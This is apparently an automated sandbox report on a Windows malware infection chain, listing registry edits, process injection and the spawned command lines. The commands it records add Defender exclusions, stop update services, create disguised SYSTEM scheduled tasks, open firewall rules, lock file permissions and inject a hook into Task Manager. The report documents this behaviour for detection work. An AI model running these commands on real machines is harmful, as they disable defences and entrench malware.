Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SYSTEM32\schtasks.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69E4.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\62BD.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\schtasks.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3148 wrote to memory of 1392 N/A N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 3148 wrote to memory of 1392 N/A N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 3148 wrote to memory of 1392 N/A N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 3148 wrote to memory of 4508 N/A N/A C:\Users\Admin\AppData\Local\Temp\62BD.exe
PID 3148 wrote to memory of 4508 N/A N/A C:\Users\Admin\AppData\Local\Temp\62BD.exe
PID 3148 wrote to memory of 4508 N/A N/A C:\Users\Admin\AppData\Local\Temp\62BD.exe
PID 3148 wrote to memory of 3260 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3148 wrote to memory of 3260 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3148 wrote to memory of 2136 N/A N/A C:\Users\Admin\AppData\Local\Temp\67FF.exe
PID 3148 wrote to memory of 2136 N/A N/A C:\Users\Admin\AppData\Local\Temp\67FF.exe
PID 3148 wrote to memory of 2136 N/A N/A C:\Users\Admin\AppData\Local\Temp\67FF.exe
PID 3260 wrote to memory of 4528 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3260 wrote to memory of 4528 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3260 wrote to memory of 4528 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3148 wrote to memory of 3168 N/A N/A C:\Users\Admin\AppData\Local\Temp\69E4.exe
PID 3148 wrote to memory of 3168 N/A N/A C:\Users\Admin\AppData\Local\Temp\69E4.exe
PID 3148 wrote to memory of 3168 N/A N/A C:\Users\Admin\AppData\Local\Temp\69E4.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 3148 wrote to memory of 4804 N/A N/A C:\Users\Admin\AppData\Local\Temp\759D.exe
PID 3148 wrote to memory of 4804 N/A N/A C:\Users\Admin\AppData\Local\Temp\759D.exe
PID 3148 wrote to memory of 4804 N/A N/A C:\Users\Admin\AppData\Local\Temp\759D.exe
PID 3148 wrote to memory of 408 N/A N/A C:\Users\Admin\AppData\Local\Temp\7C46.exe
PID 3148 wrote to memory of 408 N/A N/A C:\Users\Admin\AppData\Local\Temp\7C46.exe
PID 3148 wrote to memory of 408 N/A N/A C:\Users\Admin\AppData\Local\Temp\7C46.exe
PID 4804 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\759D.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 4804 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\759D.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 4804 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\759D.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 5040 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5040 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5040 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5040 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\cmd.exe
PID 5040 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\cmd.exe
PID 5040 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\cmd.exe
PID 4764 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Windows\SysWOW64\icacls.exe
PID 4764 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Windows\SysWOW64\icacls.exe
PID 4764 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Windows\SysWOW64\icacls.exe
PID 4124 wrote to memory of 928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4124 wrote to memory of 928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4124 wrote to memory of 928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4124 wrote to memory of 260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4124 wrote to memory of 260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4124 wrote to memory of 260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3148 wrote to memory of 3956 N/A N/A C:\Users\Admin\AppData\Local\Temp\9349.exe
PID 3148 wrote to memory of 3956 N/A N/A C:\Users\Admin\AppData\Local\Temp\9349.exe
PID 3148 wrote to memory of 3956 N/A N/A C:\Users\Admin\AppData\Local\Temp\9349.exe
PID 3148 wrote to memory of 4344 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3148 wrote to memory of 4344 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3148 wrote to memory of 4344 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3148 wrote to memory of 4344 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 4124 wrote to memory of 4752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4124 wrote to memory of 4752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4124 wrote to memory of 4752 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3148 wrote to memory of 4412 N/A N/A C:\Windows\explorer.exe
PID 3148 wrote to memory of 4412 N/A N/A C:\Windows\explorer.exe
PID 3148 wrote to memory of 4412 N/A N/A C:\Windows\explorer.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe"

C:\Users\Admin\AppData\Local\Temp\5F80.exe

C:\Users\Admin\AppData\Local\Temp\5F80.exe

C:\Users\Admin\AppData\Local\Temp\62BD.exe

C:\Users\Admin\AppData\Local\Temp\62BD.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\661A.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\661A.dll

C:\Users\Admin\AppData\Local\Temp\69E4.exe

C:\Users\Admin\AppData\Local\Temp\69E4.exe

C:\Users\Admin\AppData\Local\Temp\67FF.exe

C:\Users\Admin\AppData\Local\Temp\67FF.exe

C:\Users\Admin\AppData\Local\Temp\5F80.exe

C:\Users\Admin\AppData\Local\Temp\5F80.exe

C:\Users\Admin\AppData\Local\Temp\759D.exe

C:\Users\Admin\AppData\Local\Temp\759D.exe

C:\Users\Admin\AppData\Local\Temp\7C46.exe

C:\Users\Admin\AppData\Local\Temp\7C46.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\dc7c59b8-8c2b-47e1-90e4-3d05406bc4c2" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 408 -ip 408

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 344

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\9349.exe

C:\Users\Admin\AppData\Local\Temp\9349.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:R" /E

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:R" /E

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\5F80.exe

"C:\Users\Admin\AppData\Local\Temp\5F80.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\5F80.exe

"C:\Users\Admin\AppData\Local\Temp\5F80.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3020 -ip 3020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 568

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\Temp\9349.exe

"C:\Users\Admin\AppData\Local\Temp\9349.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\kyabiylzsfjo.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\Conhost.exe

